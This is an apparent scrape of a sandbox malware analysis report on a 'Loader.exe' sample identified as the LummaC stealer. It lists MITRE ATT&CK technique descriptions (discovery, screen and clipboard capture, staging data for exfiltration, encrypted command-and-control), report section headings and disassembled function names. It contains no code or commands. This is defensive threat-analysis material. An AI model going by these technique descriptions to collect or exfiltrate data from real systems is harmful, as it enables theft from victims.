Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
Loader.exe

Function 00CF019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00CC1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Function 00CD6642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Function 00CC20C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Function 00CC1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Function 00CCF293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMON

Function 00CDD3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMON

Function 00CD72A8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 00CDDB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMON

Function 00CD7192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00CC2010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 00CD64F3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 00CD56B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMON

Function 00CD7837 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Function 00CD670D Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre